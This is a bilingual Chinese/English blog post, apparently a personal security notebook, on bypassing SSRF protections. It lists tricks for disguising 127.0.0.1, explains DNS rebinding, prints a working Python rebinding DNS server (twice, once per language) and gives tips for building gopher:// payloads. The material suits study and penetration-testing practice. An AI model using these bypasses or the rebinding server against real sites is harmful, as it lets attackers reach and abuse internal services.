<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">

















  <meta name="baidu-site-verification" content="wD6I1h8lGi">









<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">

<link rel="stylesheet" href="/css/main.css?v=7.1.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.2">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.2" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down. 本篇文章采用中文和英文两种语言编写，内容完全相同。如需查看中文版请下滑。 Bypass in SSRFIn the place wh">
<meta property="og:type" content="article">
<meta property="og:title" content="SSRF Bypass&#x2F;SSRF中的Bypass">
<meta property="og:url" content="http://ama666.cn/2021/02/09/SSRF中的Bypass/index.html">
<meta property="og:site_name" content="ama666">
<meta property="og:description" content="This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down. 本篇文章采用中文和英文两种语言编写，内容完全相同。如需查看中文版请下滑。 Bypass in SSRFIn the place wh">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210209173206.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210209173206.png">
<meta property="og:updated_time" content="2021-10-23T02:42:25.791Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SSRF Bypass&#x2F;SSRF中的Bypass">
<meta name="twitter:description" content="This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down. 本篇文章采用中文和英文两种语言编写，内容完全相同。如需查看中文版请下滑。 Bypass in SSRFIn the place wh">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210209173206.png">





  
  
  <link rel="canonical" href="http://ama666.cn/2021/02/09/SSRF中的Bypass/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>SSRF Bypass/SSRF中的Bypass | ama666</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ama666</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">平时多喝点茶</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-sitemap">

    
    
    
      
    

    

    <a href="/sitemap.xml" rel="section"><i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>站点地图</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://ama666.cn/2021/02/09/SSRF中的Bypass/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="安大侠">
      <meta itemprop="description" content="每天挣扎的活着">
      <meta itemprop="image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20190616124508.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ama666">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SSRF Bypass/SSRF中的Bypass

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2021-02-09 14:15:54" itemprop="dateCreated datePublished" datetime="2021-02-09T14:15:54+08:00">2021-02-09</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2021-10-23 10:42:25" itemprop="dateModified" datetime="2021-10-23T10:42:25+08:00">2021-10-23</time>
              
            
          </span>

          

          
            
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down.</p>
<p>本篇文章采用中文和英文两种语言编写，内容完全相同。如需查看中文版请下滑。</p>
<h1 id="Bypass-in-SSRF"><a href="#Bypass-in-SSRF" class="headerlink" title="Bypass in SSRF"></a>Bypass in SSRF</h1><p>In the place where the ssrf link is submitted, the internal network address <code>127.0.0.1</code> can be bypassed using other expressions. The equivalent bypass methods are</p>
<ul>
<li>127.0.0.1.xip.io</li>
</ul>
<blockquote>
<p>xip.io resolves domain names like site <code>10.0.0.1.xio.io</code> to 10.0.0.1</p>
</blockquote>
<ul>
<li><p>[::] instead of 127.0.0.1</p>
</li>
<li><p>Decimal ip address, the same as binary hexadecimal</p>
</li>
<li><p>Use the <code>@</code> symbol</p>
<p>If the server uses PHP or Go to parse the URL, the function used should be <code>parse_url</code>. The analysis of this function for host is based on the <code>@</code> symbol.</p>
</li>
</ul>
<p><img src="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210209173206.png" alt></p>
<h3 id="DNS-Rebinding-Attack"><a href="#DNS-Rebinding-Attack" class="headerlink" title="DNS Rebinding Attack"></a>DNS Rebinding Attack</h3><p>Quote from <a href="http://blog.leanote.com/post/snowming/e2c24cf057a4" target="_blank" rel="noopener">http://blog.leanote.com/post/snowming/e2c24cf057a4</a></p>
<blockquote>
<ol>
<li>Get the entered URL and extract host from the URL</li>
<li>Perform DNS resolution on the host and get the resolved IP</li>
<li>Check whether the IP is legal, such as whether it is a private IP, etc.</li>
<li>If the IP detection is legal, then enter the curl stage to send packets</li>
</ol>
<p>Observe that in this process, a total of two DNS resolutions are performed: the first time is to perform DNS resolution on the host of the URL, and the second time is to resolve when using CURL to send packages. There is a time difference between the two DNS resolutions, and we can use this time difference to bypass.</p>
<p>The mechanism in DNS corresponding to the event difference is <code>TTL</code>. TTL represents the longest time that the cache of the binding relationship between the domain name and IP in the DNS can survive in the DNS. That is, after requesting the relationship between the domain name and the iP, the requesting party will cache the relationship, and the cache retention time is the TTL. The cache will be deleted after invalidation. At this time, if the IP specified by the domain name is accessed again, the matching relationship and cache will be re-established.</p>
<p>In the above process, if we can change the IP corresponding to the URL during the second DNS resolution, then after the TTL, after the cache expires, if we revisit the URL, we can get the changed IP. If we set the first parsed IP as a legal IP, we can bypass the host legitimacy check; set the second parsed IP as the intranet IP to achieve the purpose of SSRF access to the intranet.</p>
<p>In this process, for the browser, the entire process is accessed by the same domain name, so it is considered safe. This will lead to a bypass.</p>
<p>So to summarize:</p>
<p>The principle of DNS rebinding attack is to use the short interval between the server to resolve the same domain name twice and change the ip behind the domain name to achieve the purpose of breaking the same-origin policy or performing ssrf through waf.</p>
</blockquote>
<p>DNS server</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> twisted.internet <span class="keyword">import</span> reactor, defer</span><br><span class="line"><span class="keyword">from</span> twisted.names <span class="keyword">import</span> client, dns, error, server</span><br><span class="line">record=&#123;&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">DynamicResolver</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">_doDynamicResponse</span><span class="params">(self, query)</span>:</span></span><br><span class="line">        name = query.name.name</span><br><span class="line">        <span class="keyword">if</span> name <span class="keyword">not</span> <span class="keyword">in</span> record <span class="keyword">or</span> record[name]&lt;<span class="number">1</span>:</span><br><span class="line">            <span class="comment"># Randomly an IP, just bypass the check</span></span><br><span class="line">            ip=<span class="string">"104.160.43.154"</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            ip=<span class="string">"127.0.0.1"</span></span><br><span class="line">        <span class="keyword">if</span> name <span class="keyword">not</span> <span class="keyword">in</span> record:</span><br><span class="line">            record[name]=<span class="number">0</span></span><br><span class="line">        record[name]+=<span class="number">1</span></span><br><span class="line">        <span class="keyword">print</span> name+<span class="string">" ===&gt; "</span>+ip</span><br><span class="line">        answer = dns.RRHeader(</span><br><span class="line">            name=name,</span><br><span class="line">            type=dns.A,</span><br><span class="line">            cls=dns.IN,</span><br><span class="line">            ttl=<span class="number">0</span>,</span><br><span class="line">            payload=dns.Record_A(address=<span class="string">b'%s'</span>%ip,ttl=<span class="number">0</span>)</span><br><span class="line">        )</span><br><span class="line">        answers = [answer]</span><br><span class="line">        authority = []</span><br><span class="line">        additional = []</span><br><span class="line">        <span class="keyword">return</span> answers, authority, additional</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">query</span><span class="params">(self, query, timeout=None)</span>:</span></span><br><span class="line">        <span class="keyword">return</span> defer.succeed(self._doDynamicResponse(query))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    factory = server.DNSServerFactory(</span><br><span class="line">        clients=[DynamicResolver(), client.Resolver(resolv=<span class="string">'/etc/resolv.conf'</span>)]</span><br><span class="line">    )</span><br><span class="line">    protocol = dns.DNSDatagramProtocol(controller=factory)</span><br><span class="line">    reactor.listenUDP(<span class="number">53</span>, protocol)</span><br><span class="line">    reactor.run()</span><br><span class="line"><span class="keyword">if</span> __name__ ==<span class="string">'__main__'</span>:</span><br><span class="line">    <span class="keyword">raise</span> SystemExit(main())</span><br></pre></td></tr></table></figure>

<p>Enter the address of this fake DNS server at the SSRF vulnerability point. When the first request was made, the fake DNS server returned a legal IP address, and the victim website passed the verification and started to make the curl request. At this time, what the fake DNS server returns is the intranet address, and the attack is realized.</p>
<h2 id="gopher-protocol-notes"><a href="#gopher-protocol-notes" class="headerlink" title="gopher protocol notes"></a>gopher protocol notes</h2><p>Update the precautions when writing gopher</p>
<ul>
<li><p>The format of the gopher protocol is <strong>gopher://IP:port/_{TCP/IP data stream}</strong>. Don’t forget the <code>_</code> in front of the protocol.</p>
</li>
<li><p>%0A after URL encoding should be replaced with %0D%0A, which means line break</p>
</li>
<li><p>Content-Length must be correct</p>
</li>
</ul>
<h1 id="SSRF中的Bypass"><a href="#SSRF中的Bypass" class="headerlink" title="SSRF中的Bypass"></a>SSRF中的Bypass</h1><p>主要记录一下SSRF漏洞利用过程中的绕过手段。</p>
<p>在ssrf链接提交的地方屏蔽了内网地址<code>127.0.0.1</code>可以使用其他的表达方式绕过，等价的绕过方法有</p>
<ul>
<li>127.0.0.1.xip.io</li>
</ul>
<blockquote>
<p>xip.io将类似site.10.0.0.1.xio.io这样的域名解析成10.0.0.1</p>
</blockquote>
<ul>
<li><p>[::]代替127.0.0.1</p>
</li>
<li><p>十进制的ip地址，同理2进制16进制</p>
</li>
<li><p>使用<code>@</code>符号</p>
<p>如果服务器使用的是PHP或者go对URL进行解析，使用的函数应该是<code>parse_url</code>。这个函数对于host的解析是以<code>@</code>符号后面为基准的。</p>
<p><img src="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210209173206.png" alt></p>
</li>
</ul>
<h3 id="DNS-Rebinding-Attack-1"><a href="#DNS-Rebinding-Attack-1" class="headerlink" title="DNS Rebinding Attack"></a>DNS Rebinding Attack</h3><p>引用<a href="http://blog.leanote.com/post/snowming/e2c24cf057a4" target="_blank" rel="noopener">http://blog.leanote.com/post/snowming/e2c24cf057a4</a></p>
<blockquote>
<ol>
<li>获取到输入的URL，从该URL中提取host</li>
<li>对该host进行DNS解析，获取到解析的IP</li>
<li>检测该IP是否是合法的，比如是否是私有IP等</li>
<li>如果IP检测为合法的，则进入curl的阶段发包</li>
</ol>
<p>观察到，在这个流程中，一共进行了两次DNS解析：第一次是对URL的host进行DNS解析，第二次是使用CURL发包的时候进行解析。这两次DNS解析是有时间差的，我们可以使用这个时间差进行绕过。</p>
<p>事件差对应的DNS中的机制是<code>TTL</code>。TTL表示DNS里面域名和IP绑定关系的Cache在DNS上存活的最长时间。即请求了域名与iP的关系后，请求方会缓存这个关系，缓存保持的时间就是TTL。而缓存失效后就会删除，这时候如果重新访问域名指定的IP的话会重新建立匹配关系及cache。</p>
<p>在上面的流程中，如果在DNS第二次解析的时候，我们能够更换URL对应的IP，那么在TTL之后、缓存失效之后，重新访问此URL的话，就能获取被更换后的IP。如果我们把第一次解析的IP设为合法IP，就能绕过host合法性检查了；把第二次解析的IP设为内网IP，就达到了SSRF访问内网的目的。</p>
<p>在这个过程中，对于浏览器来说，整个过程访问的都是同一域名，所以认为是安全的。这就会导致绕过。</p>
<p>所以总结一下：</p>
<p>DNS 重绑定攻击的原理是：利用服务器两次解析同一域名的短暂间隙，更换域名背后的ip达到突破同源策略或过waf进行ssrf的目的。</p>
</blockquote>
<p>DNS服务器</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> twisted.internet <span class="keyword">import</span> reactor, defer</span><br><span class="line"><span class="keyword">from</span> twisted.names <span class="keyword">import</span> client, dns, error, server</span><br><span class="line">record=&#123;&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">DynamicResolver</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">_doDynamicResponse</span><span class="params">(self, query)</span>:</span></span><br><span class="line">        name = query.name.name</span><br><span class="line">        <span class="keyword">if</span> name <span class="keyword">not</span> <span class="keyword">in</span> record <span class="keyword">or</span> record[name]&lt;<span class="number">1</span>:</span><br><span class="line">            <span class="comment"># 随意一个 IP，绕过检查即可</span></span><br><span class="line">            ip=<span class="string">"104.160.43.154"</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            ip=<span class="string">"127.0.0.1"</span></span><br><span class="line">        <span class="keyword">if</span> name <span class="keyword">not</span> <span class="keyword">in</span> record:</span><br><span class="line">            record[name]=<span class="number">0</span></span><br><span class="line">        record[name]+=<span class="number">1</span></span><br><span class="line">        <span class="keyword">print</span> name+<span class="string">" ===&gt; "</span>+ip</span><br><span class="line">        answer = dns.RRHeader(</span><br><span class="line">            name=name,</span><br><span class="line">            type=dns.A,</span><br><span class="line">            cls=dns.IN,</span><br><span class="line">            ttl=<span class="number">0</span>,</span><br><span class="line">            payload=dns.Record_A(address=<span class="string">b'%s'</span>%ip,ttl=<span class="number">0</span>)</span><br><span class="line">        )</span><br><span class="line">        answers = [answer]</span><br><span class="line">        authority = []</span><br><span class="line">        additional = []</span><br><span class="line">        <span class="keyword">return</span> answers, authority, additional</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">query</span><span class="params">(self, query, timeout=None)</span>:</span></span><br><span class="line">        <span class="keyword">return</span> defer.succeed(self._doDynamicResponse(query))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    factory = server.DNSServerFactory(</span><br><span class="line">        clients=[DynamicResolver(), client.Resolver(resolv=<span class="string">'/etc/resolv.conf'</span>)]</span><br><span class="line">    )</span><br><span class="line">    protocol = dns.DNSDatagramProtocol(controller=factory)</span><br><span class="line">    reactor.listenUDP(<span class="number">53</span>, protocol)</span><br><span class="line">    reactor.run()</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    <span class="keyword">raise</span> SystemExit(main())</span><br></pre></td></tr></table></figure>

<p>在SSRF漏洞点输入此伪造DNS服务器的地址。第一次请求的时候伪造DNS服务器返回的是合法的IP地址，受害网站验证通过，开始进行curl请求。此时伪造DNS服务器返回的是内网地址，实现攻击。</p>
<h2 id="gopher协议注意事项"><a href="#gopher协议注意事项" class="headerlink" title="gopher协议注意事项"></a>gopher协议注意事项</h2><p>更新一下写gopher的时候的注意事项</p>
<ul>
<li><p>gopher协议的格式为<strong>gopher://IP:port/_{TCP/IP数据流}</strong>，协议前面的<code>_</code>不要忘记。</p>
</li>
<li><p>URL编码后的%0A要替换为%0D%0A，表示换行</p>
</li>
<li><p>Content-Length长度一定要正确</p>
</li>
</ul>

      
    </div>

    

    
    
    

    

    
      
    
    

    
      <div>
        




  



<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>安大侠</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    
    <a href="http://ama666.cn/2021/02/09/SSRF中的Bypass/" title="SSRF Bypass/SSRF中的Bypass">http://ama666.cn/2021/02/09/SSRF中的Bypass/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li>
</ul>

      </div>
    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/02/08/JSON情景下的CSRF攻击/" rel="next" title="CSRF attack in JSON scenario/JSON情景下的CSRF攻击">
                <i class="fa fa-chevron-left"></i> CSRF attack in JSON scenario/JSON情景下的CSRF攻击
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/02/12/权限维持初探/" rel="prev" title="Privilege maintenance/权限维持初探">
                Privilege maintenance/权限维持初探 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20190616124508.png" alt="安大侠">
            
              <p class="site-author-name" itemprop="name">安大侠</p>
              <div class="site-description motion-element" itemprop="description">每天挣扎的活着</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">66</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  
                    
                      <a href="/categories/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">12</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">标签</span>
                  
                </div>
              
            </nav>
          

          

          

          

          
             <div class="cc-license motion-element" itemprop="license">
              
              
                
              
              
              
              <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
             </div>
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hengyud.cn" title="https://hengyud.cn" rel="noopener" target="_blank">小P</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.lookupes.cn" title="http://blog.lookupes.cn" rel="noopener" target="_blank">孙哥</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://timeshu.github.io" title="https://timeshu.github.io" rel="noopener" target="_blank">Time</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://zo1ro.github.io" title="http://zo1ro.github.io" rel="noopener" target="_blank">imy0r1in</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://jgeek.cn/" title="https://jgeek.cn/" rel="noopener" target="_blank">\0x584A</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Bypass-in-SSRF"><span class="nav-number">1.</span> <span class="nav-text">Bypass in SSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DNS-Rebinding-Attack"><span class="nav-number">1.0.1.</span> <span class="nav-text">DNS Rebinding Attack</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#gopher-protocol-notes"><span class="nav-number">1.1.</span> <span class="nav-text">gopher protocol notes</span></a></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#SSRF中的Bypass"><span class="nav-number">2.</span> <span class="nav-text">SSRF中的Bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DNS-Rebinding-Attack-1"><span class="nav-number">2.0.1.</span> <span class="nav-text">DNS Rebinding Attack</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#gopher协议注意事项"><span class="nav-number">2.1.</span> <span class="nav-text">gopher协议注意事项</span></a></li></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">安大侠</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.1.2</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="总访客量">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="post-meta-divider">|</span>
  

  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="总访问量">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.2"></script>

  <script src="/js/motion.js?v=7.1.2"></script>



  
  


  <script src="/js/affix.js?v=7.1.2"></script>

  <script src="/js/schemes/pisces.js?v=7.1.2"></script>




  
  <script src="/js/scrollspy.js?v=7.1.2"></script>
<script src="/js/post-details.js?v=7.1.2"></script>



  


  <script src="/js/next-boot.js?v=7.1.2"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
